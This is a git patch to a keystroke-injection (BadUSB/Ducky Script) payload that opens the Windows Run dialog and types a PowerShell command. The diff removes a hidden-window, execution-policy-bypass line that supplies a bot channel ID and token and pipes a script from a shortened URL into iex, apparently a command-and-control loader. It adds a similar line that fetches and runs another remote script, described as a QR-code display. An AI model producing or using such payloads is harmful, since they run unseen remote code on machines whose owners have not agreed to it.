From 6576e0ae9d6e79957cc4daada7e9ad296ac984cd Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 27 Mar 2024 19:58:33 +0000 Subject: [PATCH] Update Console-QRcode.txt --- Console-QRcode/Console-QRcode.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/Console-QRcode/Console-QRcode.txt b/Console-QRcode/Console-QRcode.txt index 5810ee6..70fa9d3 100644 --- a/Console-QRcode/Console-QRcode.txt +++ b/Console-QRcode/Console-QRcode.txt @@ -4,12 +4,13 @@ REM Author: @beigeworm REM Description: Uses Powershell to display a generated QR code from text or a URL REM Target: Windows 10 and 11 -REM some setup for dukie script +REM SETUP +REM Replace https://beigeworm.com with your url ot text string. + DEFAULT_DELAY 100 -REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex -ENTER \ No newline at end of file +STRING powershell -Ep Bypass -C $txt = 'https://beigeworm.com'; irm https://is.gd/bwpsqrcode | iex +ENTER